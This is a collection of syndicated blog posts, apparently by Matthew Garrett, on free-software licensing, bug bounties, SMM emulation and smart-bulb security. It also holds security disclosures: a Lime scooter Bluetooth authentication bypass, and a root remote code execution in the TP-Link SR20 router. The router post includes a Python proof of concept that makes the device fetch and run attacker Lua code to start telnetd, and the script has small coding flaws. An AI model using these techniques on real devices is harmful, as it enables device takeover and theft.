Unfortunately for nefarious individuals, all commands sent over Bluetooth are ignored until an authentication step is performed. The code I looked at had two ways of performing authentication – you could send an authentication token that was derived from the scooter’s IMEI and the current time and some other stuff, or you could send a token that was just an HMAC of the IMEI and a static secret. Doing the latter was more appealing, both because it’s simpler and because doing so flipped the scooter into manufacturing mode at which point all other command validation was also disabled (bye bye having to generate a TOTP). But how do we get the IMEI? There’s actually two approaches:

1) Read it off the sticker that’s on the side of the scooter (obvious, uninteresting)
2) Take advantage of how the scooter’s Bluetooth name is generated

Remember the 8 digits of hex I mentioned earlier? They’re generated by taking the IMEI, encrypting it using DES and a static key (0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88), discarding the first 4 bytes of the output and turning the last 4 bytes into 8 digits of hex. Since we’re discarding information, there’s no way to immediately reverse the process – but IMEIs for a given manufacturer are all allocated from the same range, so we can just take the entire possible IMEI space for the modem chipset Lime use, encrypt all of them and end up with a mapping of name to IMEI (it turns out this doesn’t guarantee that the mapping is unique – for around 0.01%, the same name maps to two different IMEIs). So we now have enough information to generate an authentication token that we can send over Bluetooth, which disables all further authentication and enables us to send further commands to disconnect the scooter from the network (so we can’t be tracked) and then unlock and enable the scooter.

(Note: these are actual crimes)

This all seemed very exciting, but then a shock twist occurred – earlier this year, Lime updated their authentication method and now there’s actual asymmetric cryptography involved and you’d need to engage in rather more actual crimes to obtain the key material necessary to authenticate over Bluetooth, and all of this research becomes much less interesting other than as an example of how other companies probably shouldn’t do it.

In any case, congratulations to Lime on actually implementing security!

comment count unavailable comments

Do we need to rethink what free software is?

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/52907.html

Licensing has always been a fundamental tool in achieving free software’s goals, with copyleft licenses deliberately taking advantage of copyright to ensure that all further recipients of software are in a position to exercise free software’s four essential freedoms. Recently we’ve seen people raising two very different concerns around existing licenses and proposing new types of license as remedies, and while both are (at present) incompatible with our existing concepts of what free software is, they both raise genuine issues that the community should seriously consider.

The first is the rise in licenses that attempt to restrict business models based around providing software as a service. If users can pay Amazon to provide a hosted version of a piece of software, there’s little incentive for them to pay the authors of that software. This has led to various projects adopting license terms such as the Commons Clause that effectively make it nonviable to provide such a service, forcing providers to pay for a commercial use license instead.

In general the entities pushing for these licenses are VC backed companies[1] who are themselves benefiting from free software written by volunteers that they give nothing back to, so I have very little sympathy. But it does raise a larger issue – how do we ensure that production of free software isn’t just a mechanism for the transformation of unpaid labour into corporate profit? I’m fortunate enough to be paid to write free software, but many projects of immense infrastructural importance are simultaneously fundamental to multiple business models and also chronically underfunded. In an era where people are becoming increasingly vocal about wealth and power disparity, this obvious unfairness will result in people attempting to find mechanisms to impose some degree of balance – and given the degree to which copyleft licenses prevented certain abuses of the commons, it’s likely that people will attempt to do so using licenses.

At the same time, people are spending more time considering some of the other ethical outcomes of free software. Copyleft ensures that you can share your code with your neighbour without your neighbour being able to deny the same freedom to others, but it does nothing to prevent your neighbour using your code to deny other fundamental, non-software, freedoms. As governments make more and more use of technology to perform acts of mass surveillance, detention, and even genocide, software authors may feel legitimately appalled at the idea that they are helping enable this by allowing their software to be used for any purpose. The JSON license includes a requirement that “The Software shall be used for Good, not Evil”, but the lack of any meaningful clarity around what “Good” and “Evil” actually mean makes it hard to determine whether it achieved its aims.

The definition of free software includes the assertion that it must be possible to use the software for any purpose. But if it is possible to use software in such a way that others lose their freedom to exercise those rights, is this really the standard we should be holding? Again, it’s unsurprising that people will attempt to solve this problem through licensing, even if in doing so they no longer meet the current definition of free software.

I don’t have solutions for these problems, and I don’t know for sure that it’s possible to solve them without causing more harm than good in the process. But in the absence of these issues being discussed within the free software community, we risk free software being splintered – on one side, with companies imposing increasingly draconian licensing terms in an attempt to prop up their business models, and on the other side, with people deciding that protecting people’s freedom to life, liberty and the pursuit of happiness is more important than protecting their freedom to use software to deny those freedoms to others.

As stewards of the free software definition, the Free Software Foundation should be taking the lead in ensuring that these issues are discussed. The priority of the board right now should be to restructure itself to ensure that it can legitimately claim to represent the community and play the leadership role it’s been failing to in recent years, otherwise the opportunity will be lost and much of the activist energy that underpins free software will be spent elsewhere.

If free software is going to maintain relevance, it needs to continue to explain how it interacts with contemporary social issues. If any organisation is going to claim to lead the community, it needs to be doing that.

[1] Plus one VC firm itself – Bain Capital, an investment firm notorious for investing in companies, extracting as much value as possible and then allowing the companies to go bankrupt

comment count unavailable comments

It’s time to talk about post-RMS Free Software

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/52587.html

Richard Stallman has once again managed to demonstrate incredible insensitivity[1]. There’s an argument that in a pure technical universe this is irrelevant and we should instead only consider what he does in free software[2], but free software isn’t a purely technical topic – the GNU Manifesto is nakedly political, and while free software may result in better technical outcomes it is fundamentally focused on individual freedom and will compromise on technical excellence if otherwise the result would be any compromise on those freedoms. And in a political movement, there is no way that we can ignore the behaviour and beliefs of that movement’s leader. Stallman is driving away our natural allies. It’s inappropriate for him to continue as the figurehead for free software.

But I’m not calling for Stallman to be replaced. If the history of social movements has taught us anything, it’s that tying a movement to a single individual is a recipe for disaster. The FSF needs a president, but there’s no need for that person to be a leader – instead, we need to foster an environment where any member of the community can feel empowered to speak up about the importance of free software. A decentralised movement about returning freedoms to individuals can’t also be about elevating a single individual to near-magical status. Heroes will always end up letting us down. We fix that by removing the need for heroes in the first place, not attempting to find increasingly perfect heroes.

Stallman was never going to save us. We need to take responsibility for saving ourselves. Let’s talk about how we do that.

[1] There will doubtless be people who will leap to his defense with the assertion that he’s neurodivergent and all of these cases are consequences of that.

(A) I am unaware of a formal diagnosis of that, and I am unqualified to make one myself. I suspect that basically everyone making that argument is similarly unqualified.
(B) I’ve spent a lot of time working with him to help him understand why various positions he holds are harmful. I’ve reached the conclusion that it’s not that he’s unable to understand, he’s just unwilling to change his mind.

[2] This argument is, obviously, bullshit

comment count unavailable comments

Bug bounties and NDAs are an option, not the standard

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/52432.html

Zoom had a vulnerability that allowed users on MacOS to be connected to a video conference with their webcam active simply by visiting an appropriately crafted page. Zoom’s response has largely been to argue that:

a) There’s a setting you can toggle to disable the webcam being on by default, so this isn’t a big deal,
b) When Safari added a security feature requiring that users explicitly agree to launch Zoom, this created a poor user experience and so they were justified in working around this (and so introducing the vulnerability), and,
c) The submitter asked whether Zoom would pay them for disclosing the bug, and when Zoom said they’d only do so if the submitter signed an NDA, they declined.

(a) and (b) are clearly ludicrous arguments, but (c) is the interesting one. Zoom go on to mention that they disagreed with the severity of the issue, and in the end decided not to change how their software worked. If the submitter had agreed to the terms of the NDA, then Zoom’s decision that this was a low severity issue would have led to them being given a small amount of money and never being allowed to talk about the vulnerability. Since Zoom apparently have no intention of fixing it, we’d presumably never have heard about it. Users would have been less informed, and the world would have been a less secure place.

The point of bug bounties is to provide people with an additional incentive to disclose security issues to companies. But what incentive are they offering? Well, that depends on who you are. For many people, the amount of money offered by bug bounty programs is meaningful, and agreeing to sign an NDA is worth it. For others, the ability to publicly talk about the issue is worth more than whatever the bounty may award – being able to give a presentation on the vulnerability at a high profile conference may be enough to get you a significantly better paying job. Others may be unwilling to sign an NDA on principle, refusing to trust that the company will ever disclose the issue or fix the vulnerability. And finally there are people who can’t sign such an NDA – they may have discovered the issue on work time, and employer policies may prohibit them doing so.

Zoom are correct that it’s not unusual for bug bounty programs to require NDAs. But when they talk about this being an industry standard, they come awfully close to suggesting that the submitter did something unusual or unreasonable in rejecting their bounty terms. When someone lets you know about a vulnerability, they’re giving you an opportunity to have the issue fixed before the public knows about it. They’ve done something they didn’t need to do – they could have just publicly disclosed it immediately, causing significant damage to your reputation and potentially putting your customers at risk. They could potentially have sold the information to a third party. But they didn’t – they came to you first. If you want to offer them money in order to encourage them (and others) to do the same in future, then that’s great. If you want to tie strings to that money, that’s a choice you can make – but there’s no reason for them to agree to those strings, and if they choose not to then you don’t get to complain about that afterwards. And if they make it clear at the time of submission that they intend to publicly disclose the issue after 90 days, then they’re acting in accordance with widely accepted norms. If you’re not able to fix an issue within 90 days, that’s very much your problem.

If your bug bounty requires people sign an NDA, you should think about why. If it’s so you can control disclosure and delay things beyond 90 days (and potentially never disclose at all), look at whether the amount of money you’re offering for that is anywhere near commensurate with the value the submitter could otherwise gain from the information and compare that to the reputational damage you’ll take from people deciding that it’s not worth it and just disclosing unilaterally. And, seriously, never ask for an NDA before you’re committing to a specific $ amount – it’s never reasonable to ask that someone sign away their rights without knowing exactly what they’re getting in return.

tl;dr – a bug bounty should only be one component of your vulnerability reporting process. You need to be prepared for people to decline any restrictions you wish to place on them, and you need to be prepared for them to disclose on the date they initially proposed. If they give you 90 days, that’s entirely within industry norms. Remember that a bargain is being struck here – you offering money isn’t being generous, it’s you attempting to provide an incentive for people to help you improve your security. If you’re asking people to give up more than you’re offering in return, don’t be surprised if they say no.

comment count unavailable comments

Creating hardware where no hardware exists

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/52149.html

The laptop industry was still in its infancy back in 1990, but it still faced a core problem that we do today – power and thermal management are hard, but also critical to a good user experience (and potentially to the lifespan of the hardware). This is in the days where DOS and Windows had no memory protection, so handling these problems at the OS level would have been an invitation for someone to overwrite your management code and potentially kill your laptop. The safe option was pushing all of this out to an external management controller of some sort, but vendors in the 90s were the same as vendors now and would do basically anything to avoid having to drop an extra chip on the board. Thankfully(?), Intel had a solution.

The 386SL was released in October 1990 as a low-powered mobile-optimised version of the 386. Critically, it included a feature that let vendors ensure that their power management code could run without OS interference. A small window of RAM was hidden behind the VGA memory[1] and the CPU configured so that various events would cause the CPU to stop executing the OS and jump to this protected region. It could then do whatever power or thermal management tasks were necessary and return control to the OS, which would be none the wiser. Intel called this System Management Mode, and we’ve never really recovered.

Step forward to the late 90s. USB is now a thing, but even the operating systems that support USB usually don’t in their installers (and plenty of operating systems still didn’t have USB drivers). The industry needed a transition path, and System Management Mode was there for them. By configuring the chipset to generate a System Management Interrupt (or SMI) whenever the OS tried to access the PS/2 keyboard controller, the CPU could then trap into some SMM code that knew how to talk to USB, figure out what was going on with the USB keyboard, fake up the results and pass them back to the OS. As far as the OS was concerned, it was talking to a normal keyboard controller – but in reality, the “hardware” it was talking to was entirely implemented in software on the CPU.

Since then we’ve seen even more stuff get crammed into SMM, which is annoying because in general it’s much harder for an OS to do interesting things with hardware if the CPU occasionally stops in order to run invisible code to touch hardware resources you were planning on using, and that’s even ignoring the fact that operating systems in general don’t really appreciate the entire world stopping and then restarting some time later without any notification. So, overall, SMM is a pain for OS vendors.

Change of topic. When Apple moved to x86 CPUs in the mid 2000s, they faced a problem. Their hardware was basically now just a PC, and that meant people were going to try to run their OS on random PC hardware. For various reasons this was unappealing, and so Apple took advantage of the one significant difference between their platforms and generic PCs. x86 Macs have a component called the System Management Controller that (ironically) seems to do a bunch of the stuff that the 386SL was designed to do on the CPU. It runs the fans, it reports hardware information, it controls the keyboard backlight, it does all kinds of things. So Apple embedded a string in the SMC, and the OS tries to read it on boot. If it fails, so does boot[2]. Qemu has a driver that emulates enough of the SMC that you can provide that string on the command line and boot OS X in qemu, something that’s documented further here.

What does this have to do with SMM? It turns out that you can configure x86 chipsets to trap into SMM on arbitrary IO port ranges, and older Macs had SMCs in IO port space[3]. After some fighting with Intel documentation[4] I had Coreboot’s SMI handler responding to writes to an arbitrary IO port range. With some more fighting I was able to fake up responses to reads as well. And then I took qemu’s SMC emulation driver and merged it into Coreboot’s SMM code. Now, accesses to the IO port range that the SMC occupies on real hardware generate SMIs, trap into SMM on the CPU, run the emulation code, handle writes, fake up responses to reads and return control to the OS. From the OS’s perspective, this is entirely invisible[5]. We’ve created hardware where none existed.

The tree where I’m working on this is here, and I’ll see if it’s possible to clean this up in a reasonable way to get it merged into mainline Coreboot. Note that this only handles the SMC – actually booting OS X involves a lot more, but that’s something for another time.

[1] If the OS attempts to access this range, the chipset directs it to the video card instead of to actual RAM.
[2] It’s actually more complicated than that – see here for more.
[3] IO port space is a weird x86 feature where there’s an entire separate IO bus that isn’t part of the memory map and which requires different instructions to access. It’s low performance but also extremely simple, so hardware that has no performance requirements is often implemented using it.
[4] Some current Intel hardware has two sets of registers defined for setting up which IO ports should trap into SMM. I can’t find anything that documents what the relationship between them is, but if you program the obvious ones nothing happens and if you program the ones that are hidden in the section about LPC decoding ranges things suddenly start working.
[5] Eh technically a sufficiently enthusiastic OS could notice that the time it took for the access to occur didn’t match what it should on real hardware, or could look at the CPU’s count of the number of SMIs that have occurred and correlate that with accesses, but good enough

comment count unavailable comments

Which smart bulbs should you buy (from a security perspective)

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/51910.html

People keep asking me which smart bulbs they should buy. It’s a great question! As someone who has, for some reason, ended up spending a bunch of time reverse engineering various types of lightbulb, I’m probably a reasonable person to ask. So. There are four primary communications mechanisms for bulbs: wifi, bluetooth, zigbee and zwave. There’s basically zero compelling reasons to care about zwave, so I’m not going to.

Wifi

Advantages: Doesn’t need an additional hub – you can just put the bulbs wherever. The bulbs can connect out to a cloud service, so you can control them even if you’re not on the same network.
Disadvantages: Only works if you have wifi coverage, each bulb has to have wifi hardware and be configured appropriately.
Which should you get: If you search Amazon for “wifi bulb” you’ll get a whole bunch of cheap bulbs. Don’t buy any of them. They’re mostly based on a custom protocol from Zengge and they’re shit. Colour reproduction is bad, there’s no good way to use the colour LEDs and the white LEDs simultaneously, and if you use any of the vendor apps they’ll proxy your device control through a remote server with terrible authentication mechanisms. Just don’t. The ones that aren’t Zengge are generally based on the Tuya platform, whose security model is to have keys embedded in some incredibly obfuscated code and hope that nobody can find them. TP-Link make some reasonably competent bulbs but also use a weird custom protocol with hand-rolled security. Eufy are fine but again there’s weird custom security. Lifx are the best bulbs, but have zero security on the local network – anyone on your wifi can control the bulbs. If that’s something you care about then they’re a bad choice, but also if that’s something you care about maybe just don’t let people you don’t trust use your wifi.
Conclusion: If you have to use wifi, go with lifx. Their security is not meaningfully worse than anything else on the market (and they’re better than many), and they’re better bulbs. But you probably shouldn’t go with wifi.

Bluetooth

Advantages: Doesn’t need an additional hub. Doesn’t need wifi coverage. Doesn’t connect to the internet, so remote attack is unlikely.
Disadvantages: Only one control device at a time can connect to a bulb, so harder to share. Control device needs to be in Bluetooth range of the bulb. Doesn’t connect to the internet, so you can’t control your bulbs remotely.
Which should you get: Again, most Bluetooth bulbs you’ll find on Amazon are shit. There’s a whole bunch of weird custom protocols and the quality of the bulbs is just bad. If you’re going to go with anything, go with the C by GE bulbs. Their protocol is still some AES-encrypted custom binary thing, but they use a Bluetooth controller from Telink that supports a mesh network protocol. This means that you can talk to any bulb in your network and still send commands to other bulbs – the dual advantages here are that you can communicate with bulbs that are outside the range of your control device and also that you can have as many control devices as you have bulbs. If you’ve bought into the Google Home ecosystem, you can associate them directly with a Home and use Google Assistant to control them remotely. GE also sell a wifi bridge – I have one, but haven’t had time to review it yet, so make no assertions around its competence. The colour bulbs are also disappointing, with much dimmer colour output than white output.

Zigbee

Advantages: Zigbee is a mesh protocol, so bulbs can forward messages to each other. The bulbs are also pretty cheap. Zigbee is a standard, so you can obtain bulbs from several vendors that will then interoperate – unfortunately there are actually two separate standards for Zigbee bulbs, and you’ll sometimes find yourself with incompatibility issues there.
Disadvantages: Your phone doesn’t have a Zigbee radio, so you can’t communicate with the bulbs directly. You’ll need a hub of some sort to bridge between IP and Zigbee. The ecosystem is kind of a mess, and you may have weird incompatibilities.
Which should you get: Pretty much every vendor that produces Zigbee bulbs also produces a hub for them. Don’t get the Sengled hub – anyone on the local network can perform arbitrary unauthenticated command execution on it. I’ve previously recommended the Ikea Tradfri, which at the time only had local control. They’ve since added remote control support, and I haven’t investigated that in detail. But overall, I’d go with the Philips Hue. Their colour bulbs are simply the best on the market, and their security story seems solid – performing a factory reset on the hub generates a new keypair, and adding local control users requires a physical button press on the hub to allow pairing. Using the Philips hub doesn’t tie you into only using Philips bulbs, but right now the Philips bulbs tend to be as cheap (or cheaper) than anything else.

But what about

If you’re into tying together all kinds of home automation stuff, then either go with Smartthings or roll your own with Home Assistant. Both are definitely more effort if you only want lighting.

My priority is software freedom

Excellent! There are various bulbs that can run the Espurna or AiLight firmwares, but you’ll have to deal with flashing them yourself. You can tie that into Home Assistant and have a completely free stack. If you’re ok with your bulbs being proprietary, Home Assistant can speak to most types of bulb without an additional hub (you’ll need a supported Zigbee USB stick to control Zigbee bulbs), and will support the C by GE ones as soon as I figure out why my Bluetooth transmissions stop working every so often.

Conclusion

Outside niche cases, just buy a Hue. Philips have done a genuinely good job. Don’t buy cheap wifi bulbs. Don’t buy a Sengled hub.

(Disclaimer: I mentioned a Google product above. I am a Google employee, but do not work on anything related to Home.)

comment count unavailable comments

Remote code execution as root from the local network on TP-Link SR20 routers

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/51672.html

The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign – popen() passes its argument directly to the shell, so if there’s any way to get user controlled input into a popen() call you’re basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here’s a cut down decompilation of the function:

int ftest_config(char *byte) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64]
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}

Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear – once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the “Detailed description” field being limited to 500 characters. The page informed me that I’d hear back within three business days – a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else’s attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There’s a couple of morals here:

  • Don’t default to running debug daemons on production firmware seriously how hard is this
  • If you’re going to have a security disclosure form, read it

Proof of concept:

#!/usr/bin/python3

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
 
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename
 
import binascii
import socket
 
port_send = 1040
port_receive = 61000
 
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00
 
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
 
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
 
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()
 
response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch

comment count unavailable comments

Initial thoughts on MongoDB’s new Server Side Public License

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/51230.html

MongoDB just announced that they were relicensing under their new Server Side Public License. This is basically the Affero GPL except with section 13 largely replaced with new text, as follows:

If you make the functionality of the Program or a modified version available to third parties as a service, you must make the Service Source Code available via network download to everyone at no charge, under the terms of this License. Making the functionality of the Program or modified version available to third parties as a service includes, without limitation, enabling third parties to interact with the functionality of the Program or modified version remotely through a computer network, offering a service the value of which entirely or primarily derives from the value of the Program or modified version, or offering a service that accomplishes for users the primary purpose of the Software or modified version.

“Service Source Code” means the Corresponding Source for the Program or the modified version, and the Corresponding Source for all programs that you use to make the Program or modified version available as a service, including, without limitation, management software, user interfaces, application program interfaces, automation software, monitoring software, backup software, storage software and hosting software, all such that a user could run an instance of the service using the Service Source Code you make available.

MongoDB admit that this license is not currently open source in the sense of being approved by the Open Source Initiative, but say:We believe that the SSPL meets the standards for an open source license and are working to have it approved by the OSI.

At the broadest level, AGPL requires you to distribute the source code to the AGPLed work[1] while the SSPL requires you to distribute the source code to everything involved in providing the service. Having a license place requirements around things that aren’t derived works of the covered code is unusual but not entirely unheard of – the GPL requires you to provide build scripts even if they’re not strictly derived works, and you could probably make an argument that the anti-Tivoisation provisions of GPL3 fall into this category.

A stranger point is that you’re required to provide all of this under the terms of the SSPL. If you have any code in your stack that can’t be released under those terms then it’s literally impossible for you to comply with this license. I’m not a lawyer, so I’ll leave it up to them to figure out whether this means you’re now only allowed to deploy MongoDB on BSD because the license would require you to relicense Linux away from the GPL. This feels sloppy rather than deliberate, but if it is deliberate then it’s a massively greater reach than any existing copyleft license.

You can definitely make arguments that this is just a maximalist copyleft license, the AGPL taken to extreme, and therefore it fits the open source criteria. But there’s a point where something is so far from the previously accepted scenarios that it’s actually something different, and should be examined as a new category rather than already approved categories. I suspect that this license has been written to conform to a strict reading of the Open Source Definition, and that any attempt by OSI to declare it as not being open source will receive pushback. But definitions don’t exist to be weaponised against the communities that they seek to protect, and a license that has overly onerous terms should be rejected even if that means changing the definition.

In general I am strongly in favour of licenses ensuring that users have the freedom to take advantage of modifications that people have made to free software, and I’m a fan of the AGPL. But my initial feeling is that this license is a deliberate attempt to make it practically impossible to take advantage of the freedoms that the license nominally grants, and this impression is strengthened by it being something that’s been announced with immediate effect rather than something that’s been developed with community input. I think there’s a bunch of worthwhile discussion to have about whether the AGPL is strong and clear enough to achieve its goals, but I don’t think that this SSPL is the answer to that – and I lean towards thinking that it’s not a good faith attempt to produce a usable open source license.

(It should go without saying that this is my personal opinion as a member of the free software community, and not that of my employer)

[1] There’s some complexities around GPL3 code that’s incorporated into the AGPLed work, but if it’s not part of the AGPLed work then it’s not covered

comment count unavailable comments

The Commons Clause doesn’t help the commons

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/51177.html

The Commons Clause was announced recently, along with several projects moving portions of their codebase under it. It’s an additional restriction intended to be applied to existing open source licenses with the effect of preventing the work from being sold[1], where the definition of being sold includes being used as a component of an online pay-for service. As described in the FAQ, this changes the effective license of the work from an open source license to a source-available license. However, the site doesn’t go into a great deal of detail as to why you’d want to do that.

Fortunately one of the VCs behind this move wrote an opinion article that goes into more detail. The central argument is that Amazon make use of a great deal of open source software and integrate it into commercial products that are incredibly lucrative, but give little back to the community in return. By adopting the commons clause, Amazon will be forced to negotiate with the projects before being able to use covered versions of the software. This will, apparently, prevent behaviour that is not conducive to sustainable open-source communities.

But this is where things get somewhat confusing. The author continues:

Our view is that open-source software was never intended for cloud infrastructure companies to take and sell. That is not the original ethos of open source.

which is a pretty astonishingly unsupported argument. Open source code has been incorporated into proprietary applications without giving back to the originating community since before the term open source even existed. MIT-licensed X11 became part of not only multiple Unixes, but also a variety of proprietary commercial products for non-Unix platforms. Large portions of BSD ended up in a whole range of proprietary operating systems (including older versions of Windows). The only argument in favour of this assertion is that cloud infrastructure companies didn’t exist at that point in time, so they weren’t taken into consideration[2] – but no argument is made as to why cloud infrastructure companies are fundamentally different to proprietary operating system companies in this respect. Both took open source code, incorporated it into other products and sold them on without (in most cases) giving anything back.

There’s one counter-argument. When companies sold products based on open source code, they distributed it. Copyleft licenses like the GPL trigger on distribution, and as a result selling products based on copyleft code meant that the community would gain access to any modifications the vendor had made – improvements could be incorporated back into the original work, and everyone benefited. Incorporating open source code into a cloud product generally doesn’t count as distribution, and so the source code disclosure requirements don’t trigger. So perhaps that’s the distinction being made?

Well, no. The GNU Affero GPL has a clause that covers this case – if you provide a network service based on AGPLed code then you must provide the source code in a similar way to if you distributed it under a more traditional copyleft license. But the article’s author goes on to say:

AGPL makes it inconvenient but does not prevent cloud infrastructure providers from engaging in the abusive behavior described above. It simply says that they must release any modifications they make while engaging in such behavior.

IE, the problem isn’t that cloud providers aren’t giving back code, it’s that they’re using the code without contributing financially. There’s no difference between what cloud providers are doing now and what proprietary operating system vendors were doing 30 years ago. The argument that “open source” was never intended to permit this sort of behaviour is simply untrue. The use of permissive licenses has always allowed large companies to benefit disproportionately when compared to the authors of said code. There’s nothing new to see here.

But that doesn’t mean that the status quo is good – the argument for why the commons clause is required may be specious, but that doesn’t mean it’s bad. We’ve seen multiple cases of open source projects struggling to obtain the resources required to make a project sustainable, even as many large companies make significant amounts of money off that work. Does the commons clause help us here?

As hinted at in the title, the answer’s no. The commons clause attempts to change the power dynamic of the author/user role, but it does so in a way that’s fundamentally tied to a business model and in a way that prevents many of the things that make open source software interesting to begin with. Let’s talk about some problems.

The power dynamic still doesn’t favour contributors

The commons clause only really works if there’s a single copyright holder – if not, selling the code requires you to get permission from multiple people. But the clause does nothing to guarantee that the people who actually write the code benefit, merely that whoever holds the copyright does. If I rewrite a large part of a covered work and that code is merged (presumably after I’ve signed a CLA that assigns a copyright grant to the project owners), I have no power in any negotiations with any cloud providers. There’s no guarantee that the project stewards will choose to reward me in any way. I contribute to them but get nothing back in return – instead, my improved code allows the project owners to charge more and provide stronger returns for the VCs. The inequity has shifted, but individual contributors still lose out.

It discourages use of covered projects

One of the benefits of being able to use open source software is that you don’t need to fill out purchase orders or start commercial negotiations before you’re able to deploy. Turns out the project doesn’t actually fill your needs? Revert it, and all you’ve lost is some development time. Adding additional barriers is going to reduce uptake of covered projects, and that does nothing to benefit the contributors.

You can no longer meaningfully fork a project

One of the strengths of open source projects is that if the original project stewards turn out to violate the trust of their community, someone can fork it and provide a reasonable alternative. But if the project is released with the commons clause, it’s impossible to sell any forked versions – anyone who wishes to do so would still need the permission of the original copyright holder, and they can refuse that in order to prevent a fork from gaining any significant uptake.

It doesn’t inherently benefit the commons

The entire argument here is that the cloud providers are exploiting the commons, and by forcing them to pay for a license that allows them to make use of that software the commons will benefit. But there’s no obvious link between these things. Maybe extra money will result in more development work being done and the commons benefiting, but maybe extra money will instead just result in greater payout to shareholders. Forcing cloud providers to release their modifications to the wider world would be of benefit to the commons, but this is explicitly ruled out as a goal. The clause isn’t inherently incompatible with this – the negotiations between a vendor and a project to obtain a license to be permitted to sell the code could include a commitment to provide patches rather money, for instance, but the focus on money makes it clear that this wasn’t the authors’ priority.

What we’re left with is a license condition that does nothing to benefit individual contributors or other users, and costs us the opportunity to fork projects in response to disagreements over design decisions or governance. What it does is ensure that a range of VC-backed projects are in a better position to improve their returns, without any guarantee that the commons will be left better off. It’s an attempt to solve a problem that’s existed since before the term “open source” was even coined, by simply layering on a business model that’s also existed since before the term “open source” was even coined[3]. It’s not anything new, and open source derives from an explicit rejection of this sort of business model.

That’s not to say we’re in a good place at the moment. It’s clear that there is a giant level of power disparity between many projects and the consumers of those projects. But we’re not going to fix that by simply discarding many of the benefits of open source and going back to an older way of doing things. Companies like Tidelift[4] are trying to identify ways of making this sustainable without losing the things that make open source a better way of doing software development in the first place, and that’s what we should be focusing on rather than just admitting defeat to satisfy a small number of VC-backed firms that have otherwise failed to develop a sustainable business model.

[1] It is unclear how this interacts with licenses that include clauses that assert you can remove any additional restrictions that have been applied
[2] Although companies like Hotmail were making money from running open source software before the open source definition existed, so this still seems like a reach
[3] “Source available” predates my existence, let alone any existing open source licenses
[4] Disclosure: I know several people involved in Tidelift, but have no financial involvement in the company

comment count unavailable comments

Porting Coreboot to the 51NB X210

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/50924.html

